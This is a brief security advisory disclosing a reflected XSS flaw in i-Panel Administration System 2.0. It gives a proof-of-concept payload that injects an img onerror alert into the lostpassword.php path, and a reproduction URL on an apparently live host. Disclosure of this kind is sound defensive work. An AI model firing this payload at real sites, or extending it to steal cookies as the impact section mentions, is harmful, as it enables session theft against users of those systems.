Reflected XSS Vulnerability in i-Panel Administration System Version 2.0

Summary

i-Panel Administration System is a multifunctional website management system. Customers can easily manage websites through this system, such as managing email accounts, file management, subdomain management, directory password protection, custom error pages, IP refusal to browse, and change Password and other functions. Version 2.0 of the application was found to be vulnerable to Reflected XSS.

Impact

The XSS could facilitate attackers in executing malicious JavaScript on victim machines such as stealing cookies or redirecting users.

Details

i-Panel Administration System Version Affected: 2.0
Browser Affected: Chrome, FireFox, Edge

As a proof of concept, an alert box can be generated with the following payload:

GET /lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22XSSVulnerable%22)%3E HTTP/1.1

URL to reproduce the PoC attack

https://web20.myhost.com.hk/lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22XSSVulnerable%22)%3E


Discovered and written by Forster Chiu, All rights reserved.